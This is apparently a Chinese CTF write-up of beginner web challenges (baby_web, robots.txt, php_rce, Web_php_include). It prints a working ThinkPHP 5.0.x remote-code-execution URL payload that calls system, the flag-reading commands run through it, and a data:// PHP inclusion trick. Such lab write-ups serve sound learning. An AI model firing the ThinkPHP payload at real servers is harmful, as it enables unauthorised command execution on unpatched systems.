web_1

baby_web:

想想初始页面是哪个

在这里插入图片描述看到初始页面我觉得和index.php有关,试了几下发现把url中的1.php换成index.php才找得到flag
换成index.php回车之后虽然url后面还是1.php,但是Fn+F12的网络中多了一个index.php的文件,flag就在index.php中
在这里插入图片描述

Training-WWW-Robots

在这里插入图片描述
Robots_exclusion_standard好像可以点开

在这里插入图片描述
其实点不开
url后拼接/robots.txt

在这里插入图片描述爬取不了,就直接查看
将robots.txt改成fl0g.php得到flag

在这里插入图片描述

php_rce:

在这里插入图片描述
GitHub上搜索ThinkPHP V5

在这里插入图片描述在这里插入图片描述

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

url后拼接2

在这里插入图片描述漏洞版本为5.0.20
url后拼接1
在这里插入图片描述发现可以进行远程命令执行

find / -name flag*

在这里插入图片描述

cat /flag

在这里插入图片描述
Remote Code Execution Vulnerability :远程命令执行漏洞,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码

Web_php_include:

在这里插入图片描述strstr() 函数搜索字符串在另一字符串中的第一次出现,该函数对大小写敏感

strstr(string,search,before_search)
参数描述
string必需。规定被搜索的字符串
search必需。规定所搜索的字符串。如果此参数是数字,则搜索匹配此数字对应的 ASCII 值的字符
before_search可选。默认值为 “false” 的布尔值。如果设置为 “true”,它将返回 search 参数第一次出现之前的字符串部分
str_replace()函数以其他字符替换字符串中的一些字符,该函数区分大小写
该函数必须遵循下列规则:
a. 如果搜索的字符串是数组,那么它将返回数组。
b.如果搜索的字符串是数组,那么它将对数组中的每个元素进行查找和替换。
c.如果同时需要对数组进行查找和替换,并且需要执行替换的元素少于查找到的元素的数量,那么多余元素将用空字符串进行替换
d.如果查找的是数组,而替换的是字符串,那么替代字符串将对所有查找到的值起作用
str_replace(find,replace,string,count)
参数描述
find必需。规定要查找的值
replace必需。规定替换 find 中的值的值
string必需。规定被搜索的字符串
count可选。对替换数进行计数的变量

data:// 用法

data://text/plain,base64

关于data://

在这里插入图片描述cat一下得到flag

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值